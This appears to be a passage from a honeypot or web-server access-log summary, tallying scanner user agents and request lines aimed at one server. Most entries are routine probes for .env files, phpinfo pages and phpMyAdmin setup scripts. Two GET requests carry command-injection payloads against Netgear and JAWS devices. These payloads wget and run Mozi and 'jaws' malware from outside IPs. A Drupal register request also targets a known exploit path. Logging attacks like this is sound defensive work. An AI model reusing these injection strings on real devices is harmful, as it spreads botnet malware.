2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
56	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
6	`Mozilla/5.0 zgrab/0.x`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x17\x01`
1		`\x16\x03\x01\x02`
19		`\x16\x03\x01`
59	GET	`/.env`	HTTP/1.1
2	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/text/list`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//175[.]107[.]0[.]204:44668/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/test.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//13[.]67[.]44[.]234:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//13[.]67[.]44[.]234:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	POST	`/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax`	HTTP/1.1
1	PRI	`*`	HTTP/2.0